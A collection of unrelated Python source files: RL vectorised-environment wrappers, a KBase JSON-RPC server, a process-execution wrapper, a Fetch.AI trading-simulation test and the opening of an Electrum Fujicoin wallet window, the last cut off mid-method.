self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
class VecNormalize(VecEnvWrapper):
"""
Vectorized environment base class
"""
def __init__(self, venv, ob=True, ret=True, clipob=10., cliprew=10., gamma=0.99, epsilon=1e-8):
VecEnvWrapper.__init__(self, venv)
self.ob_rms = RunningMeanStd(shape=self.observation_space.shape) if ob else None
self.ret_rms = RunningMeanStd(shape=()) if ret else None
self.clipob = clipob
self.cliprew = cliprew
self.ret = np.zeros(self.num_envs)
self.gamma = gamma
self.epsilon = epsilon
def step_wait(self):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, news)
where 'news' is a boolean vector indicating whether each element is new.
"""
obs, rews, news, infos = self.venv.step_wait()
self.ret = self.ret * self.gamma + rews
obs = self._obfilt(obs)
if self.ret_rms:
self.ret_rms.update(self.ret)
rews = np.clip(rews / np.sqrt(self.ret_rms.var + self.epsilon), -self.cliprew, self.cliprew)
return obs, rews, news, infos
def _obfilt(self, obs):
if self.ob_rms:
self.ob_rms.update(obs)
obs = np.clip((obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clipob, self.clipob)
return obs
else:
return obs
def reset(self):
"""
Reset all environments
"""
obs = self.venv.reset()
return self._obfilt(obs)
from gym import spaces
from collections import OrderedDict
import numpy as np
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
shapes, dtypes = {}, {}
self.keys = []
obs_space = env.observation_space
subspaces = {None: obs_space}
for key, box in subspaces.items():
shapes[key] = box.shape
dtypes[key] = np.float32
self.keys.append(key)
self.buf_obs = { k: np.zeros((self.num_envs,) + tuple(shapes[k]), dtype=dtypes[k]) for k in self.keys }
self.buf_dones = np.zeros((self.num_envs,), dtype=np.bool)
self.buf_rews = np.zeros((self.num_envs,), dtype=np.float32)
self.buf_infos = [{} for _ in range(self.num_envs)]
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
for e in range(self.num_envs):
obs, self.buf_rews[e], self.buf_dones[e], self.buf_infos[e] = self.envs[e].step(self.actions[e])
if self.buf_dones[e]:
obs = self.envs[e].reset()
self._save_obs(e, obs)
return (self._obs_from_buf(), np.copy(self.buf_rews), np.copy(self.buf_dones),
self.buf_infos.copy())
def reset(self):
for e in range(self.num_envs):
obs = self.envs[e].reset()
self._save_obs(e, obs)
return self._obs_from_buf()
def close(self):
return
def render(self, mode='human'):
return [e.render(mode=mode) for e in self.envs]
def _save_obs(self, e, obs):
for k in self.keys:
if k is None:
self.buf_obs[k][e] = obs
else:
self.buf_obs[k][e] = obs[k]
def _obs_from_buf(self):
if self.keys==[None]:
return self.buf_obs[None]
else:
return self.buf_obs
|
minimal_synthetic_communityServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from minimal_synthetic_community.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'minimal_synthetic_community'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from minimal_synthetic_community.minimal_synthetic_communityImpl import minimal_synthetic_community # noqa @IgnorePep8
impl_minimal_synthetic_community = minimal_synthetic_community(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'minimal_synthetic_community'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_minimal_synthetic_community.run_minimal_synthetic_community,
name='minimal_synthetic_community.run_minimal_synthetic_community',
types=[dict])
self.method_authentication['minimal_synthetic_community.run_minimal_synthetic_community'] = 'required' # noqa
self.rpc_service.add(impl_minimal_synthetic_community.status,
name='minimal_synthetic_community.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'minimal_synthetic_community ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
execution.py
|
import abc
import os
import queue
import signal
import sys
import threading
class ProcessWrapper(metaclass=abc.ABCMeta):
process = None
output = None
command_identifier = None
finish_listeners = None
def __init__(self, command, command_identifier, working_directory):
self.command_identifier = command_identifier
self.finish_listeners = []
self.init_process(command, working_directory)
self.output = queue.Queue()
read_output_thread = threading.Thread(target=self.pipe_process_output, args=())
read_output_thread.start()
notify_finish_thread = threading.Thread(target=self.notify_finished)
notify_finish_thread.start()
@abc.abstractmethod
def pipe_process_output(self):
pass
@abc.abstractmethod
def init_process(self, command, working_directory):
pass
@abc.abstractmethod
def write_to_input(self, value):
pass
@abc.abstractmethod
def wait_finish(self):
pass
def get_process_id(self):
return self.process.pid
def is_finished(self):
return self.process.poll() is not None
def get_return_code(self):
return self.process.returncode
def stop(self):
if not self.is_finished():
if not sys.platform.startswith('win'):
group_id = os.getpgid(self.get_process_id())
os.killpg(group_id, signal.SIGTERM)
class KillChildren(object):
def finished(self):
try:
os.killpg(group_id, signal.SIGKILL)
except ProcessLookupError:
# probably there are no children left
pass
self.add_finish_listener(KillChildren())
else:
self.process.terminate()
self.output.put("\n>> STOPPED BY USER\n")
def kill(self):
if not self.is_finished():
if not sys.platform.startswith('win'):
group_id = os.getpgid(self.get_process_id())
os.killpg(group_id, signal.SIGKILL)
self.output.put("\n>> KILLED\n")
else:
subprocess.Popen("taskkill /F /T /PID " + self.get_process_id())
def read(self):
while True:
try:
result = self.output.get(True, 0.2)
try:
added_text = result
while added_text:
added_text = self.output.get_nowait()
result += added_text
except queue.Empty:
pass
return result
except queue.Empty:
if self.is_finished():
break
def add_finish_listener(self, listener):
self.finish_listeners.append(listener)
if self.is_finished():
self.notify_finished()
def notify_finished(self):
self.wait_finish()
for listener in self.finish_listeners:
listener.finished()
def get_command_identifier(self):
return self.command_identifier
|
test_simulation.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the simulation."""
import datetime
from threading import Thread
from typing import List
import numpy as np
import pytest
from tac.agents.controller.agent import ControllerAgent
from tac.agents.controller.base.states import Game
from tac.agents.controller.base.tac_parameters import TACParameters
from tac.agents.participant.v1.base.strategy import SearchFor, RegisterAs
from tac.agents.participant.v1.examples.baseline import BaselineAgent as BaselineAgentV1
from tac.agents.participant.v1.examples.strategy import BaselineStrategy
from tac.gui.monitor import NullMonitor
def _init_baseline_agents(
n: int, agent_version: str, oef_addr: str, oef_port: int, tac_version_id: str
) -> List[BaselineAgentV1]:
"""Baseline agents initialization."""
if agent_version == "v1":
return [
BaselineAgentV1(
"baseline_{:02}".format(i),
"127.0.0.1",
10000,
BaselineStrategy(
search_for=SearchFor.BOTH, register_as=RegisterAs.BOTH
),
expected_version_id=tac_version_id,
pending_transaction_timeout=120,
)
for i in range(n)
]
else:
raise ValueError("Invalid version.")
def _run_baseline_agent(agent: BaselineAgentV1, agent_version: str) -> None:
"""Run a baseline agent. The version."""
if agent_version == "v1":
agent.start()
else:
pytest.fail("Baseline agent version not recognized: {} (must be 'v1')")
@pytest.fixture(params=["v1"])
def baseline_version(request):
"""Version setting."""
return request.param
@pytest.mark.integration
class TestSimulation:
"""Class to test the simulation."""
@pytest.fixture(autouse=True)
def _start_oef_node(self, network_node):
pass
@classmethod
def setup_class(cls):
"""Class setup."""
cls.tac_version_id = "1"
cls.agent_version = "v1"
cls.baseline_agents = _init_baseline_agents(
5, cls.agent_version, "127.0.0.1", 10000, cls.tac_version_id
)
cls.tac_parameters = TACParameters(
min_nb_agents=5,
money_endowment=200,
nb_goods=5,
tx_fee=1.0,
base_good_endowment=2,
lower_bound_factor=0,
upper_bound_factor=0,
start_time=datetime.datetime.now() + datetime.timedelta(0, 2),
registration_timeout=8,
competition_timeout=20,
inactivity_timeout=15,
version_id=cls.tac_version_id,
)
cls.tac_controller = ControllerAgent(
"controller", "127.0.0.1", 10000, cls.tac_parameters, NullMonitor()
)
# run the simulation
try:
controller_thread = Thread(target=cls.tac_controller.start)
baseline_threads = [
Thread(target=_run_baseline_agent, args=[baseline_agent, "v1"])
for baseline_agent in cls.baseline_agents
]
# launch all thread.
all_threads = [controller_thread] + baseline_threads
for thread in all_threads:
thread.start()
# wait for every thread. This part is blocking.
for thread in all_threads:
thread.join()
except Exception as e:
pytest.fail("Got exception: {}".format(e))
def test_nb_settled_transaction_greater_than_zero(self):
"""Test that at least one transaction has been confirmed."""
assert len(self.tac_controller.game_handler.current_game.transactions) > 0
def test_game_took_place(self):
"""Test that the game actually took place, as expected."""
assert self.tac_controller.game_handler.current_game is not None
def test_baseline_agent_score_does_not_decrease(self):
"""Test that all the baseline agent scores do not decrease after each transaction."""
finished_game = self.tac_controller.game_handler.current_game
game_configuration = finished_game.configuration
game_initialization = finished_game.initialization
game = Game(game_configuration, game_initialization)
scores_dict = game.get_scores()
current_score = np.asarray(list(scores_dict.values()))
next_scores = None
for tx in finished_game.transactions:
game.settle_transaction(tx)
scores_dict = game.get_scores()
next_scores = np.asarray(list(scores_dict.values()))
assert not (next_scores < current_score).any()
current_score = next_scores
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Fujicoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
